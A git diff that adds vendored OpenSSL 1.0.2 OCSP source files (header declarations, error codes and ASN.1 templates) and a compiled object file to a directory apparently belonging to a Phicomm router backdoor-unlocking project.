+     (char *(*)())d2i_OCSP_REQUEST,PEM_STRING_OCSP_REQUEST,bp,(char **)x,cb,NULL)
+
+# define PEM_read_bio_OCSP_RESPONSE(bp,x,cb)(OCSP_RESPONSE *)PEM_ASN1_read_bio(\
+     (char *(*)())d2i_OCSP_RESPONSE,PEM_STRING_OCSP_RESPONSE,bp,(char **)x,cb,NULL)
+
+# define PEM_write_bio_OCSP_REQUEST(bp,o) \
+    PEM_ASN1_write_bio((int (*)())i2d_OCSP_REQUEST,PEM_STRING_OCSP_REQUEST,\
+                        bp,(char *)o, NULL,NULL,0,NULL,NULL)
+
+# define PEM_write_bio_OCSP_RESPONSE(bp,o) \
+    PEM_ASN1_write_bio((int (*)())i2d_OCSP_RESPONSE,PEM_STRING_OCSP_RESPONSE,\
+                        bp,(char *)o, NULL,NULL,0,NULL,NULL)
+
+# define i2d_OCSP_RESPONSE_bio(bp,o) ASN1_i2d_bio_of(OCSP_RESPONSE,i2d_OCSP_RESPONSE,bp,o)
+
+# define i2d_OCSP_REQUEST_bio(bp,o) ASN1_i2d_bio_of(OCSP_REQUEST,i2d_OCSP_REQUEST,bp,o)
+
+# define OCSP_REQUEST_sign(o,pkey,md) \
+        ASN1_item_sign(ASN1_ITEM_rptr(OCSP_REQINFO),\
+                o->optionalSignature->signatureAlgorithm,NULL,\
+                o->optionalSignature->signature,o->tbsRequest,pkey,md)
+
+# define OCSP_BASICRESP_sign(o,pkey,md,d) \
+        ASN1_item_sign(ASN1_ITEM_rptr(OCSP_RESPDATA),o->signatureAlgorithm,NULL,\
+                o->signature,o->tbsResponseData,pkey,md)
+
+# define OCSP_REQUEST_verify(a,r) ASN1_item_verify(ASN1_ITEM_rptr(OCSP_REQINFO),\
+        a->optionalSignature->signatureAlgorithm,\
+        a->optionalSignature->signature,a->tbsRequest,r)
+
+# define OCSP_BASICRESP_verify(a,r,d) ASN1_item_verify(ASN1_ITEM_rptr(OCSP_RESPDATA),\
+        a->signatureAlgorithm,a->signature,a->tbsResponseData,r)
+
+# define ASN1_BIT_STRING_digest(data,type,md,len) \
+        ASN1_item_digest(ASN1_ITEM_rptr(ASN1_BIT_STRING),type,data,md,len)
+
+# define OCSP_CERTSTATUS_dup(cs)\
+                (OCSP_CERTSTATUS*)ASN1_dup((int(*)())i2d_OCSP_CERTSTATUS,\
+                (char *(*)())d2i_OCSP_CERTSTATUS,(char *)(cs))
+
+OCSP_CERTID *OCSP_CERTID_dup(OCSP_CERTID *id);
+
+OCSP_RESPONSE *OCSP_sendreq_bio(BIO *b, const char *path, OCSP_REQUEST *req);
+OCSP_REQ_CTX *OCSP_sendreq_new(BIO *io, const char *path, OCSP_REQUEST *req,
+                               int maxline);
+int OCSP_REQ_CTX_nbio(OCSP_REQ_CTX *rctx);
+int OCSP_sendreq_nbio(OCSP_RESPONSE **presp, OCSP_REQ_CTX *rctx);
+OCSP_REQ_CTX *OCSP_REQ_CTX_new(BIO *io, int maxline);
+void OCSP_REQ_CTX_free(OCSP_REQ_CTX *rctx);
+void OCSP_set_max_response_length(OCSP_REQ_CTX *rctx, unsigned long len);
+int OCSP_REQ_CTX_i2d(OCSP_REQ_CTX *rctx, const ASN1_ITEM *it,
+                     ASN1_VALUE *val);
+int OCSP_REQ_CTX_nbio_d2i(OCSP_REQ_CTX *rctx, ASN1_VALUE **pval,
+                          const ASN1_ITEM *it);
+BIO *OCSP_REQ_CTX_get0_mem_bio(OCSP_REQ_CTX *rctx);
+int OCSP_REQ_CTX_i2d(OCSP_REQ_CTX *rctx, const ASN1_ITEM *it,
+                     ASN1_VALUE *val);
+int OCSP_REQ_CTX_http(OCSP_REQ_CTX *rctx, const char *op, const char *path);
+int OCSP_REQ_CTX_set1_req(OCSP_REQ_CTX *rctx, OCSP_REQUEST *req);
+int OCSP_REQ_CTX_add1_header(OCSP_REQ_CTX *rctx,
+                             const char *name, const char *value);
+
+OCSP_CERTID *OCSP_cert_to_id(const EVP_MD *dgst, X509 *subject, X509 *issuer);
+
+OCSP_CERTID *OCSP_cert_id_new(const EVP_MD *dgst,
+                              X509_NAME *issuerName,
+                              ASN1_BIT_STRING *issuerKey,
+                              ASN1_INTEGER *serialNumber);
+
+OCSP_ONEREQ *OCSP_request_add0_id(OCSP_REQUEST *req, OCSP_CERTID *cid);
+
+int OCSP_request_add1_nonce(OCSP_REQUEST *req, unsigned char *val, int len);
+int OCSP_basic_add1_nonce(OCSP_BASICRESP *resp, unsigned char *val, int len);
+int OCSP_check_nonce(OCSP_REQUEST *req, OCSP_BASICRESP *bs);
+int OCSP_copy_nonce(OCSP_BASICRESP *resp, OCSP_REQUEST *req);
+
+int OCSP_request_set1_name(OCSP_REQUEST *req, X509_NAME *nm);
+int OCSP_request_add1_cert(OCSP_REQUEST *req, X509 *cert);
+
+int OCSP_request_sign(OCSP_REQUEST *req,
+                      X509 *signer,
+                      EVP_PKEY *key,
+                      const EVP_MD *dgst,
+                      STACK_OF(X509) *certs, unsigned long flags);
+
+int OCSP_response_status(OCSP_RESPONSE *resp);
+OCSP_BASICRESP *OCSP_response_get1_basic(OCSP_RESPONSE *resp);
+
+int OCSP_resp_count(OCSP_BASICRESP *bs);
+OCSP_SINGLERESP *OCSP_resp_get0(OCSP_BASICRESP *bs, int idx);
+int OCSP_resp_find(OCSP_BASICRESP *bs, OCSP_CERTID *id, int last);
+int OCSP_single_get0_status(OCSP_SINGLERESP *single, int *reason,
+                            ASN1_GENERALIZEDTIME **revtime,
+                            ASN1_GENERALIZEDTIME **thisupd,
+                            ASN1_GENERALIZEDTIME **nextupd);
+int OCSP_resp_find_status(OCSP_BASICRESP *bs, OCSP_CERTID *id, int *status,
+                          int *reason,
+                          ASN1_GENERALIZEDTIME **revtime,
+                          ASN1_GENERALIZEDTIME **thisupd,
+                          ASN1_GENERALIZEDTIME **nextupd);
+int OCSP_check_validity(ASN1_GENERALIZEDTIME *thisupd,
+                        ASN1_GENERALIZEDTIME *nextupd, long sec, long maxsec);
+
+int OCSP_request_verify(OCSP_REQUEST *req, STACK_OF(X509) *certs,
+                        X509_STORE *store, unsigned long flags);
+
+int OCSP_parse_url(const char *url, char **phost, char **pport, char **ppath,
+                   int *pssl);
+
+int OCSP_id_issuer_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
+int OCSP_id_cmp(OCSP_CERTID *a, OCSP_CERTID *b);
+
+int OCSP_request_onereq_count(OCSP_REQUEST *req);
+OCSP_ONEREQ *OCSP_request_onereq_get0(OCSP_REQUEST *req, int i);
+OCSP_CERTID *OCSP_onereq_get0_id(OCSP_ONEREQ *one);
+int OCSP_id_get0_info(ASN1_OCTET_STRING **piNameHash, ASN1_OBJECT **pmd,
+                      ASN1_OCTET_STRING **pikeyHash,
+                      ASN1_INTEGER **pserial, OCSP_CERTID *cid);
+int OCSP_request_is_signed(OCSP_REQUEST *req);
+OCSP_RESPONSE *OCSP_response_create(int status, OCSP_BASICRESP *bs);
+OCSP_SINGLERESP *OCSP_basic_add1_status(OCSP_BASICRESP *rsp,
+                                        OCSP_CERTID *cid,
+                                        int status, int reason,
+                                        ASN1_TIME *revtime,
+                                        ASN1_TIME *thisupd,
+                                        ASN1_TIME *nextupd);
+int OCSP_basic_add1_cert(OCSP_BASICRESP *resp, X509 *cert);
+int OCSP_basic_sign(OCSP_BASICRESP *brsp,
+                    X509 *signer, EVP_PKEY *key, const EVP_MD *dgst,
+                    STACK_OF(X509) *certs, unsigned long flags);
+
+X509_EXTENSION *OCSP_crlID_new(char *url, long *n, char *tim);
+
+X509_EXTENSION *OCSP_accept_responses_new(char **oids);
+
+X509_EXTENSION *OCSP_archive_cutoff_new(char *tim);
+
+X509_EXTENSION *OCSP_url_svcloc_new(X509_NAME *issuer, char **urls);
+
+int OCSP_REQUEST_get_ext_count(OCSP_REQUEST *x);
+int OCSP_REQUEST_get_ext_by_NID(OCSP_REQUEST *x, int nid, int lastpos);
+int OCSP_REQUEST_get_ext_by_OBJ(OCSP_REQUEST *x, ASN1_OBJECT *obj,
+                                int lastpos);
+int OCSP_REQUEST_get_ext_by_critical(OCSP_REQUEST *x, int crit, int lastpos);
+X509_EXTENSION *OCSP_REQUEST_get_ext(OCSP_REQUEST *x, int loc);
+X509_EXTENSION *OCSP_REQUEST_delete_ext(OCSP_REQUEST *x, int loc);
+void *OCSP_REQUEST_get1_ext_d2i(OCSP_REQUEST *x, int nid, int *crit,
+                                int *idx);
+int OCSP_REQUEST_add1_ext_i2d(OCSP_REQUEST *x, int nid, void *value, int crit,
+                              unsigned long flags);
+int OCSP_REQUEST_add_ext(OCSP_REQUEST *x, X509_EXTENSION *ex, int loc);
+
+int OCSP_ONEREQ_get_ext_count(OCSP_ONEREQ *x);
+int OCSP_ONEREQ_get_ext_by_NID(OCSP_ONEREQ *x, int nid, int lastpos);
+int OCSP_ONEREQ_get_ext_by_OBJ(OCSP_ONEREQ *x, ASN1_OBJECT *obj, int lastpos);
+int OCSP_ONEREQ_get_ext_by_critical(OCSP_ONEREQ *x, int crit, int lastpos);
+X509_EXTENSION *OCSP_ONEREQ_get_ext(OCSP_ONEREQ *x, int loc);
+X509_EXTENSION *OCSP_ONEREQ_delete_ext(OCSP_ONEREQ *x, int loc);
+void *OCSP_ONEREQ_get1_ext_d2i(OCSP_ONEREQ *x, int nid, int *crit, int *idx);
+int OCSP_ONEREQ_add1_ext_i2d(OCSP_ONEREQ *x, int nid, void *value, int crit,
+                             unsigned long flags);
+int OCSP_ONEREQ_add_ext(OCSP_ONEREQ *x, X509_EXTENSION *ex, int loc);
+
+int OCSP_BASICRESP_get_ext_count(OCSP_BASICRESP *x);
+int OCSP_BASICRESP_get_ext_by_NID(OCSP_BASICRESP *x, int nid, int lastpos);
+int OCSP_BASICRESP_get_ext_by_OBJ(OCSP_BASICRESP *x, ASN1_OBJECT *obj,
+                                  int lastpos);
+int OCSP_BASICRESP_get_ext_by_critical(OCSP_BASICRESP *x, int crit,
+                                       int lastpos);
+X509_EXTENSION *OCSP_BASICRESP_get_ext(OCSP_BASICRESP *x, int loc);
+X509_EXTENSION *OCSP_BASICRESP_delete_ext(OCSP_BASICRESP *x, int loc);
+void *OCSP_BASICRESP_get1_ext_d2i(OCSP_BASICRESP *x, int nid, int *crit,
+                                  int *idx);
+int OCSP_BASICRESP_add1_ext_i2d(OCSP_BASICRESP *x, int nid, void *value,
+                                int crit, unsigned long flags);
+int OCSP_BASICRESP_add_ext(OCSP_BASICRESP *x, X509_EXTENSION *ex, int loc);
+
+int OCSP_SINGLERESP_get_ext_count(OCSP_SINGLERESP *x);
+int OCSP_SINGLERESP_get_ext_by_NID(OCSP_SINGLERESP *x, int nid, int lastpos);
+int OCSP_SINGLERESP_get_ext_by_OBJ(OCSP_SINGLERESP *x, ASN1_OBJECT *obj,
+                                   int lastpos);
+int OCSP_SINGLERESP_get_ext_by_critical(OCSP_SINGLERESP *x, int crit,
+                                        int lastpos);
+X509_EXTENSION *OCSP_SINGLERESP_get_ext(OCSP_SINGLERESP *x, int loc);
+X509_EXTENSION *OCSP_SINGLERESP_delete_ext(OCSP_SINGLERESP *x, int loc);
+void *OCSP_SINGLERESP_get1_ext_d2i(OCSP_SINGLERESP *x, int nid, int *crit,
+                                   int *idx);
+int OCSP_SINGLERESP_add1_ext_i2d(OCSP_SINGLERESP *x, int nid, void *value,
+                                 int crit, unsigned long flags);
+int OCSP_SINGLERESP_add_ext(OCSP_SINGLERESP *x, X509_EXTENSION *ex, int loc);
+
+DECLARE_ASN1_FUNCTIONS(OCSP_SINGLERESP)
+DECLARE_ASN1_FUNCTIONS(OCSP_CERTSTATUS)
+DECLARE_ASN1_FUNCTIONS(OCSP_REVOKEDINFO)
+DECLARE_ASN1_FUNCTIONS(OCSP_BASICRESP)
+DECLARE_ASN1_FUNCTIONS(OCSP_RESPDATA)
+DECLARE_ASN1_FUNCTIONS(OCSP_RESPID)
+DECLARE_ASN1_FUNCTIONS(OCSP_RESPONSE)
+DECLARE_ASN1_FUNCTIONS(OCSP_RESPBYTES)
+DECLARE_ASN1_FUNCTIONS(OCSP_ONEREQ)
+DECLARE_ASN1_FUNCTIONS(OCSP_CERTID)
+DECLARE_ASN1_FUNCTIONS(OCSP_REQUEST)
+DECLARE_ASN1_FUNCTIONS(OCSP_SIGNATURE)
+DECLARE_ASN1_FUNCTIONS(OCSP_REQINFO)
+DECLARE_ASN1_FUNCTIONS(OCSP_CRLID)
+DECLARE_ASN1_FUNCTIONS(OCSP_SERVICELOC)
+
+const char *OCSP_response_status_str(long s);
+const char *OCSP_cert_status_str(long s);
+const char *OCSP_crl_reason_str(long s);
+
+int OCSP_REQUEST_print(BIO *bp, OCSP_REQUEST *a, unsigned long flags);
+int OCSP_RESPONSE_print(BIO *bp, OCSP_RESPONSE *o, unsigned long flags);
+
+int OCSP_basic_verify(OCSP_BASICRESP *bs, STACK_OF(X509) *certs,
+                      X509_STORE *st, unsigned long flags);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_OCSP_strings(void);
+
+/* Error codes for the OCSP functions. */
+
+/* Function codes. */
+# define OCSP_F_ASN1_STRING_ENCODE                        100
+# define OCSP_F_D2I_OCSP_NONCE                            102
+# define OCSP_F_OCSP_BASIC_ADD1_STATUS                    103
+# define OCSP_F_OCSP_BASIC_SIGN                           104
+# define OCSP_F_OCSP_BASIC_VERIFY                         105
+# define OCSP_F_OCSP_CERT_ID_NEW                          101
+# define OCSP_F_OCSP_CHECK_DELEGATED                      106
+# define OCSP_F_OCSP_CHECK_IDS                            107
+# define OCSP_F_OCSP_CHECK_ISSUER                         108
+# define OCSP_F_OCSP_CHECK_VALIDITY                       115
+# define OCSP_F_OCSP_MATCH_ISSUERID                       109
+# define OCSP_F_OCSP_PARSE_URL                            114
+# define OCSP_F_OCSP_REQUEST_SIGN                         110
+# define OCSP_F_OCSP_REQUEST_VERIFY                       116
+# define OCSP_F_OCSP_RESPONSE_GET1_BASIC                  111
+# define OCSP_F_OCSP_SENDREQ_BIO                          112
+# define OCSP_F_OCSP_SENDREQ_NBIO                         117
+# define OCSP_F_PARSE_HTTP_LINE1                          118
+# define OCSP_F_REQUEST_VERIFY                            113
+
+/* Reason codes. */
+# define OCSP_R_BAD_DATA                                  100
+# define OCSP_R_CERTIFICATE_VERIFY_ERROR                  101
+# define OCSP_R_DIGEST_ERR                                102
+# define OCSP_R_ERROR_IN_NEXTUPDATE_FIELD                 122
+# define OCSP_R_ERROR_IN_THISUPDATE_FIELD                 123
+# define OCSP_R_ERROR_PARSING_URL                         121
+# define OCSP_R_MISSING_OCSPSIGNING_USAGE                 103
+# define OCSP_R_NEXTUPDATE_BEFORE_THISUPDATE              124
+# define OCSP_R_NOT_BASIC_RESPONSE                        104
+# define OCSP_R_NO_CERTIFICATES_IN_CHAIN                  105
+# define OCSP_R_NO_CONTENT                                106
+# define OCSP_R_NO_PUBLIC_KEY                             107
+# define OCSP_R_NO_RESPONSE_DATA                          108
+# define OCSP_R_NO_REVOKED_TIME                           109
+# define OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE    110
+# define OCSP_R_REQUEST_NOT_SIGNED                        128
+# define OCSP_R_RESPONSE_CONTAINS_NO_REVOCATION_DATA      111
+# define OCSP_R_ROOT_CA_NOT_TRUSTED                       112
+# define OCSP_R_SERVER_READ_ERROR                         113
+# define OCSP_R_SERVER_RESPONSE_ERROR                     114
+# define OCSP_R_SERVER_RESPONSE_PARSE_ERROR               115
+# define OCSP_R_SERVER_WRITE_ERROR                        116
+# define OCSP_R_SIGNATURE_FAILURE                         117
+# define OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND              118
+# define OCSP_R_STATUS_EXPIRED                            125
+# define OCSP_R_STATUS_NOT_YET_VALID                      126
+# define OCSP_R_STATUS_TOO_OLD                            127
+# define OCSP_R_UNKNOWN_MESSAGE_DIGEST                    119
+# define OCSP_R_UNKNOWN_NID                               120
+# define OCSP_R_UNSUPPORTED_REQUESTORNAME_TYPE            129
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.c
new file mode 100644
index 0000000..e2e52e7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.c
@@ -0,0 +1,183 @@
+/* ocsp_asn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/ocsp.h>
+
+ASN1_SEQUENCE(OCSP_SIGNATURE) = {
+        ASN1_SIMPLE(OCSP_SIGNATURE, signatureAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(OCSP_SIGNATURE, signature, ASN1_BIT_STRING),
+        ASN1_EXP_SEQUENCE_OF_OPT(OCSP_SIGNATURE, certs, X509, 0)
+} ASN1_SEQUENCE_END(OCSP_SIGNATURE)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_SIGNATURE)
+
+ASN1_SEQUENCE(OCSP_CERTID) = {
+        ASN1_SIMPLE(OCSP_CERTID, hashAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(OCSP_CERTID, issuerNameHash, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(OCSP_CERTID, issuerKeyHash, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(OCSP_CERTID, serialNumber, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(OCSP_CERTID)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_CERTID)
+
+ASN1_SEQUENCE(OCSP_ONEREQ) = {
+        ASN1_SIMPLE(OCSP_ONEREQ, reqCert, OCSP_CERTID),
+        ASN1_EXP_SEQUENCE_OF_OPT(OCSP_ONEREQ, singleRequestExtensions, X509_EXTENSION, 0)
+} ASN1_SEQUENCE_END(OCSP_ONEREQ)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_ONEREQ)
+
+ASN1_SEQUENCE(OCSP_REQINFO) = {
+        ASN1_EXP_OPT(OCSP_REQINFO, version, ASN1_INTEGER, 0),
+        ASN1_EXP_OPT(OCSP_REQINFO, requestorName, GENERAL_NAME, 1),
+        ASN1_SEQUENCE_OF(OCSP_REQINFO, requestList, OCSP_ONEREQ),
+        ASN1_EXP_SEQUENCE_OF_OPT(OCSP_REQINFO, requestExtensions, X509_EXTENSION, 2)
+} ASN1_SEQUENCE_END(OCSP_REQINFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_REQINFO)
+
+ASN1_SEQUENCE(OCSP_REQUEST) = {
+        ASN1_SIMPLE(OCSP_REQUEST, tbsRequest, OCSP_REQINFO),
+        ASN1_EXP_OPT(OCSP_REQUEST, optionalSignature, OCSP_SIGNATURE, 0)
+} ASN1_SEQUENCE_END(OCSP_REQUEST)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_REQUEST)
+
+/* OCSP_RESPONSE templates */
+
+ASN1_SEQUENCE(OCSP_RESPBYTES) = {
+            ASN1_SIMPLE(OCSP_RESPBYTES, responseType, ASN1_OBJECT),
+            ASN1_SIMPLE(OCSP_RESPBYTES, response, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(OCSP_RESPBYTES)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_RESPBYTES)
+
+ASN1_SEQUENCE(OCSP_RESPONSE) = {
+        ASN1_SIMPLE(OCSP_RESPONSE, responseStatus, ASN1_ENUMERATED),
+        ASN1_EXP_OPT(OCSP_RESPONSE, responseBytes, OCSP_RESPBYTES, 0)
+} ASN1_SEQUENCE_END(OCSP_RESPONSE)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_RESPONSE)
+
+ASN1_CHOICE(OCSP_RESPID) = {
+           ASN1_EXP(OCSP_RESPID, value.byName, X509_NAME, 1),
+           ASN1_EXP(OCSP_RESPID, value.byKey, ASN1_OCTET_STRING, 2)
+} ASN1_CHOICE_END(OCSP_RESPID)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_RESPID)
+
+ASN1_SEQUENCE(OCSP_REVOKEDINFO) = {
+        ASN1_SIMPLE(OCSP_REVOKEDINFO, revocationTime, ASN1_GENERALIZEDTIME),
+        ASN1_EXP_OPT(OCSP_REVOKEDINFO, revocationReason, ASN1_ENUMERATED, 0)
+} ASN1_SEQUENCE_END(OCSP_REVOKEDINFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_REVOKEDINFO)
+
+ASN1_CHOICE(OCSP_CERTSTATUS) = {
+        ASN1_IMP(OCSP_CERTSTATUS, value.good, ASN1_NULL, 0),
+        ASN1_IMP(OCSP_CERTSTATUS, value.revoked, OCSP_REVOKEDINFO, 1),
+        ASN1_IMP(OCSP_CERTSTATUS, value.unknown, ASN1_NULL, 2)
+} ASN1_CHOICE_END(OCSP_CERTSTATUS)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_CERTSTATUS)
+
+ASN1_SEQUENCE(OCSP_SINGLERESP) = {
+           ASN1_SIMPLE(OCSP_SINGLERESP, certId, OCSP_CERTID),
+           ASN1_SIMPLE(OCSP_SINGLERESP, certStatus, OCSP_CERTSTATUS),
+           ASN1_SIMPLE(OCSP_SINGLERESP, thisUpdate, ASN1_GENERALIZEDTIME),
+           ASN1_EXP_OPT(OCSP_SINGLERESP, nextUpdate, ASN1_GENERALIZEDTIME, 0),
+           ASN1_EXP_SEQUENCE_OF_OPT(OCSP_SINGLERESP, singleExtensions, X509_EXTENSION, 1)
+} ASN1_SEQUENCE_END(OCSP_SINGLERESP)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_SINGLERESP)
+
+ASN1_SEQUENCE(OCSP_RESPDATA) = {
+           ASN1_EXP_OPT(OCSP_RESPDATA, version, ASN1_INTEGER, 0),
+           ASN1_SIMPLE(OCSP_RESPDATA, responderId, OCSP_RESPID),
+           ASN1_SIMPLE(OCSP_RESPDATA, producedAt, ASN1_GENERALIZEDTIME),
+           ASN1_SEQUENCE_OF(OCSP_RESPDATA, responses, OCSP_SINGLERESP),
+           ASN1_EXP_SEQUENCE_OF_OPT(OCSP_RESPDATA, responseExtensions, X509_EXTENSION, 1)
+} ASN1_SEQUENCE_END(OCSP_RESPDATA)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_RESPDATA)
+
+ASN1_SEQUENCE(OCSP_BASICRESP) = {
+           ASN1_SIMPLE(OCSP_BASICRESP, tbsResponseData, OCSP_RESPDATA),
+           ASN1_SIMPLE(OCSP_BASICRESP, signatureAlgorithm, X509_ALGOR),
+           ASN1_SIMPLE(OCSP_BASICRESP, signature, ASN1_BIT_STRING),
+           ASN1_EXP_SEQUENCE_OF_OPT(OCSP_BASICRESP, certs, X509, 0)
+} ASN1_SEQUENCE_END(OCSP_BASICRESP)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_BASICRESP)
+
+ASN1_SEQUENCE(OCSP_CRLID) = {
+           ASN1_EXP_OPT(OCSP_CRLID, crlUrl, ASN1_IA5STRING, 0),
+           ASN1_EXP_OPT(OCSP_CRLID, crlNum, ASN1_INTEGER, 1),
+           ASN1_EXP_OPT(OCSP_CRLID, crlTime, ASN1_GENERALIZEDTIME, 2)
+} ASN1_SEQUENCE_END(OCSP_CRLID)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_CRLID)
+
+ASN1_SEQUENCE(OCSP_SERVICELOC) = {
+        ASN1_SIMPLE(OCSP_SERVICELOC, issuer, X509_NAME),
+        ASN1_SEQUENCE_OF_OPT(OCSP_SERVICELOC, locator, ACCESS_DESCRIPTION)
+} ASN1_SEQUENCE_END(OCSP_SERVICELOC)
+
+IMPLEMENT_ASN1_FUNCTIONS(OCSP_SERVICELOC)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_asn.o
new file mode 100644
index 0000000000000000000000000000000000000000..93ac548338ee3e1012b6934b906d32f128720f4c
GIT binary patch
literal 19424
zcmeI4Z)}^_b;e&uUhTOas$@xRAZ|ybZQ`!3K&Q!^bZ$mjqGc^C#fVg+4$eqfVkOPA
z#E_IN58lQuE#ejq$^uzqEFM5?31Sp3st+xk0tPCe>0)3WpcMh^5BVUhEz+Rrpl!wM
z6$Y|%?)#jVhez*)oj4mXAQzzSJ-_?h=l*&Bk-W73DxKMX+lCE+qz%C%K_?O#1f`))
zIpvC};Ev$-;6Fd~(cc_+=69I9$$!H5E)##w#1ESI{r0pV@2?*%!u#hBUr+yc*U!j6
zK3B}AN53#Ukj{(@1he(}Lb(=H<|ii_^R>WL4~%Ap2ZPC4Wvo`=EW2=ov%>6=awyo>
zpC29=P3Ln#<4}FHT(8d0)ysnujftQ>J3TkiSg4izE7S9}*~ZL~4hkmAwMIR3;Kqaf
zh5q1ZxmKT@p9^ZvWvW~oo(ih9`Kg7;@>G8VxL&SDrSxK>JjYGolpoFxWzudi>`%=(
z%Qt8g^`J2`TOX@VO*G2ETzRp9VtsaQx>B}A1L@I1zR+J7%Lhj%DhuVl>G}C76l>+9
z^M}h4EzBLBn?E)uGx@^Eqv^rn?EVoN<56Bm8k}3JPB>bgsM93f>he%&dBZ*q9nVhC
zs!H%^`FKY(lFg^1X=6g+GS$objyGscBENlKETr?1ws5>!jsg)qHkQs8!sGSiLb=`u
z=Bqr=iAr7$S){~VoNT`423RY*C^Jh9QMT(hlBJ{Y7}pNa0ieUqi#!^(vszwjT7#L1
z`b_6U2~S1t?f`L|nY1D<s+ViC6MQBfqO&zTiHC=>bhJj({A`JmJj;3`5*BVVv8|VC
zU;7>rAm46c34QH1iU4`S#1i`2|CR`l?=-Q5x7yyWlla>Czti=zzP|QWC;eOQYww%?
z|CjbM-y7xMG=j}0_JzLnxz+RYR@e7d`?u$(@A~wui{<uuyV>=%$Hn?eEIK(JK7Y~4
z`ufg$@qM?suYc?3>;G?z(6|0FA0xkEc&p>H=a+AMG7mW}i5rgWy%F5%{Or2^Z_V$d
znXYf#qLX#JkxtHUpU!l9!_cnB&HA?Be4}xT?!6wjOzho`U)sOZ{ASn3j?34N=x(%*
z_PV^${YBQ>cYgcEW4T=C!f$r|qJO9P&HDT1Z~ME|`CC8V`0P4)$2T-E@Y%%9u|o@U
zjfKR+eV^$|etP$w1sCrA%lngk$p=0e;;?5v?(D_S*`e%MK*x2NnLNkuq%x-se?A&)
zSnS<!_ts6DTXZsUn;otuEOU`rGKLMtu<;mHiDAtc_G}D08^bQdu$370vlw<QhHb?~
z#Pj6Dc_M~A5W^0{u!AwI8pFO4!%oMrb1`f=hP@WUei6g2$FN>p_<9XK9>X4rVVM|K
zieZfyb~1*YiD64I?3EaHC5F8f!{kEH^Su)nhh{rt*xneHi(ykSY%zwNiec>-_PrQ(
